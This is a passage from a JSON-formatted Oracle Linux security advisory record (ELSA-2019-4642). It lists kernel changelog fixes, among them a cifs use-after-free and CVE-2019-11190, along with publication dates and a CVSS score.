io_tlb_used to local variable before leaving critical section (Dongli Zhang) [Orabug: 29637525] \n- swiotlb: dump used and total slots when swiotlb buffer is full (Dongli Zhang) [Orabug: 29637525] \n- x86/bugs, kvm: don't miss SSBD when IBRS is in use. (Quentin Casasnovas) [Orabug: 29642113] \n- cifs: Fix use after free of a mid_q_entry (Shuning Zhang) [Orabug: 29654888] \n- binfmt_elf: switch to new creds when switching to new mm (Linus Torvalds) [Orabug: 29677233] {CVE-2019-11190}\n- x86/microcode: Don't return error if microcode update is not needed (Boris Ostrovsky) [Orabug: 29759756]", "edition": 2, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "ELSA-2019-4642", "href": "http://linux.oracle.com/errata/ELSA-2019-4642.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}]}